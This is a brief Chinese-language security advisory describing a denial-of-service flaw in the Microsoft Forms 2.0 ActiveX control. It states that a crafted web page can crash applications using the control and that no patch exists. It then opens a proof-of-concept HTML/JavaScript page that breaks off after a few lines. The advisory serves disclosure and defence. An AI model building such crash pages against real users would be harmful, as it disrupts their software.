BUGTRAQ ID: 26414
CNCAN ID:CNCAN-2007111603
Microsoft Forms 2.0 ActiveX Control Memory Access Violation Denial of Service Vulnerabilities
Microsoft Forms 2.0是一款微软提供的表单控件。
Microsoft Forms包含的ActiveX控件存在设计错误,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
构建恶意的WEB页,诱使用户访问,可导致使用Microsoft Forms的应用程序崩溃。
Microsoft Forms ActiveX Control 2.0
目前没有解决方案提供:
<a href=“http://www.microsoft.com/” target=“_blank”>http://www.microsoft.com/</a>
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var obj;